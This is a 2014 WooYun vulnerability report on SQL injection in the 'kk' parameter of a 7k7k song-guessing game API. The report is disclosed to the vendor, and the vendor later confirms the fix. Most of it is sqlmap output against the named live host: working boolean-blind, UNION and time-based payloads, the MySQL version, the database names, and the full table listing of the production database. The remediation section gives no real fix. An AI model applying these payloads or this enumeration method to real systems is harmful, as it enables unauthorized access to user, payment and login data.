漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-052146
漏洞标题:奇客星空某KK猜歌API接口SQL注射
相关厂商:奇客星空
漏洞作者: Neeke
提交时间:2014-02-27 14:10
修复时间:2014-04-13 14:11
公开时间:2014-04-13 14:11
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-02-27: 细节已通知厂商并且等待厂商处理中
2014-02-27: 厂商已经确认,细节仅向厂商公开
2014-03-09: 细节向核心白帽子及相关领域专家公开
2014-03-19: 细节向普通白帽子公开
2014-03-29: 细节向实习白帽子公开
2014-04-13: 细节向公众公开
简要描述:
奇客星空某KK猜歌API接口SQL注射
详细说明:
http://api.cg.7k7k.com/contest/get_nearestplaylist.php?kk=2565412332&num=3
kk参数存在注射
漏洞证明:
sqlmap identified the following injection points with a total of 36 HTTP(s) requests:
---
Place: GET
Parameter: kk
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: kk=2565412332') AND 9018=9018 AND ('zAUu'='zAUu&num=3
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: kk=-7098') UNION ALL SELECT CONCAT(0x71656b7071,0x674a6d6555687472506e,0x717a727671)#&num=3
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: kk=2565412332') AND SLEEP(5) AND ('sRhF'='sRhF&num=3
---
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: kk
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: kk=2565412332') AND 9018=9018 AND ('zAUu'='zAUu&num=3
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: kk=-7098') UNION ALL SELECT CONCAT(0x71656b7071,0x674a6d6555687472506e,0x717a727671)#&num=3
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: kk=2565412332') AND SLEEP(5) AND ('sRhF'='sRhF&num=3
---
back-end DBMS: MySQL 5.0.11
available databases [3]:
[*] cgw_new
[*] information_schema
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: kk
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: kk=2565412332') AND 9018=9018 AND ('zAUu'='zAUu&num=3
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: kk=-7098') UNION ALL SELECT CONCAT(0x71656b7071,0x674a6d6555687472506e,0x717a727671)#&num=3
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: kk=2565412332') AND SLEEP(5) AND ('sRhF'='sRhF&num=3
---
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: kk
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: kk=2565412332') AND 9018=9018 AND ('zAUu'='zAUu&num=3
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: kk=-7098') UNION ALL SELECT CONCAT(0x71656b7071,0x674a6d6555687472506e,0x717a727671)#&num=3
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: kk=2565412332') AND SLEEP(5) AND ('sRhF'='sRhF&num=3
---
back-end DBMS: MySQL 5.0.11
Database: cgw_new
[65 tables]
+--------------------------------------------------+
| cgw_announcements |
| cgw_prod_activities_achievements_settings |
| cgw_prod_activities_achievements_settings_levels |
| cgw_prod_activities_dailytask_actions |
| cgw_prod_activities_dailytask_rewards |
| cgw_prod_activities_entries |
| cgw_prod_activity_center_activity |
| cgw_prod_activity_center_advert |
| cgw_prod_album |
| cgw_prod_bulletin_default_msg |
| cgw_prod_contest |
| cgw_prod_exp |
| cgw_prod_feeds_limit |
| cgw_prod_feeds_share |
| cgw_prod_hints |
| cgw_prod_home_info |
| cgw_prod_home_info_actions |
| cgw_prod_homepage_advert |
| cgw_prod_icon_center |
| cgw_prod_items |
| cgw_prod_logondays |
| cgw_prod_packs |
| cgw_prod_playlists |
| cgw_prod_shop |
| cgw_prod_signin_rewards |
| cgw_prod_singer |
| cgw_prod_songs |
| cgw_user_album |
| cgw_user_animation |
| cgw_user_board |
| cgw_user_contest |
| cgw_user_contest_log |
| cgw_user_daily_rank |
| cgw_user_dailytask_rewards |
| cgw_user_exinfo |
| cgw_user_exp_log |
| cgw_user_flower_info |
| cgw_user_friends |
| cgw_user_gifts |
| cgw_user_got_vip_award |
| cgw_user_homeinfo |
| cgw_user_info |
| cgw_user_items |
| cgw_user_items_log |
| cgw_user_logon_log |
| cgw_user_logondays_log |
| cgw_user_mobile |
| cgw_user_opponents |
| cgw_user_orderinfo |
| cgw_user_pay_log |
| cgw_user_playlists |
| cgw_user_playlists_log |
| cgw_user_points |
| cgw_user_points_log |
| cgw_user_record |
| cgw_user_send_flowers |
| cgw_user_settings |
| cgw_user_signin_log |
| cgw_user_signin_rewards |
| cgw_user_status |
| cgw_user_task_log |
| cgw_user_tournament |
| cgw_user_vipinfo |
| cgw_user_visit |
| cgw_user_weekly_rank |
+--------------------------------------------------+
修复方案:
你懂的
版权声明:转载请注明来源 Neeke@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2014-02-27 16:26
厂商回复:
感谢白帽作者反馈,确实有此漏洞,已修复,之后联系作者发送小礼物,希望和白帽人员进行合作
最新状态:
暂无